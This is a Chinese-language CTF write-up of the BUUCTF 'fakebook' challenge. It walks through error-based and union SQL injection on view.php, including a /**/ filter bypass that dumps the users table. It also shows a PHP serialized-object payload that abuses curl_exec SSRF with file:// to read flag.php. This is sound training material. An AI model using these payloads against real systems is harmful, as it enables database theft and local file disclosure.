0x00 初试
一开始有两个选项:一个join,一个login
此处blog存在过滤
注册完返回首页发现username栏是超链接
单击后发现
url–>
http://47bdcd94-3a3d-4ae5-af77-4390d01fd436.node4.buuoj.cn:81/view.php?no=1
盲猜是注入(讲真我一开始真没有意识先去判断是数字型注入还是字符型注入)
因为手注测试的时候十分的奇怪…
先通过updatexml报错注入得到一些信息
注注注 得到
database: fakebook
table: user
column: no,username,passwd,data
but报错注入时显示出来的数据有限我觉得很麻烦(group_concat压根不够显示data列的)…感觉不是这个思路
果断看wp了
0x01 复现
首先基本功非常不扎实…就嘎了
再复习一下注入有两个小类是数字型和字符型注入
https://www.php.cn/safe/455989.html
&&做题养成扫目录习惯??(不知道是好是坏,实在没思路就扫一下⑧)
/robots.txt -->user.php.bak
已经可以猜到是反序列化了
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
补充知识:curl_exec()–>ssrf
curl_exec(); curl支持很多协议,有ftp, ftps, http, https, gopher, telnet, dict, file, ldapa
https://blog.csdn.net/Ethan024/article/details/115827938
本地测试一下
done
curl部分函数
【】curl_init : 初始化一个cURL会话,供curl_setopt(), curl_exec()和curl_close() 函数使用。
# 初始化一个会话
【】curl_setopt : 请求一个url。
# set options 进行一些配置
其中CURLOPT_URL表示需要获取的URL地址,后面就是跟上了它的值。
【*】CURLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。
【*】curl_exec,成功时返回 TRUE, 或者在失败时返回 FALSE。 然而,如果 CURLOPT_RETURNTRANSFER选项被设置,函数执行成功时会返回执行的结果,失败时返回 FALSE 。
【*】CURLINFO_HTTP_CODE :最后一个收到的HTTP代码。
curl_getinfo:以字符串形式返回它的值,因为设置了CURLINFO_HTTP_CODE,所以是返回的状态码。
原文链接:https://blog.csdn.net/qq_43622442/article/details/105633194
看了dl_wp 是数字型注入(忘了就尬了)
下面很顺畅,常规思路
联合注入就看着很舒服了
tips: union select被过滤了 中间加个注释符/**/就绕过了
payload:
-1%20union/**/select%201,(select(group_concat(concat_ws(%27~%27,no,username,passwd,data)))from(users)),3,4#
看到第四列data是序列化字符串 ->对应上user.php
显然blog就是我们的利用点了 -->file协议
其实我是真的没扫到flag.php…
payload
$a= new UserInfo();
$a->name='admin';
$a->age=21;
$a->blog='file:///var/www/html/flag.php';
echo(serialize($a));
done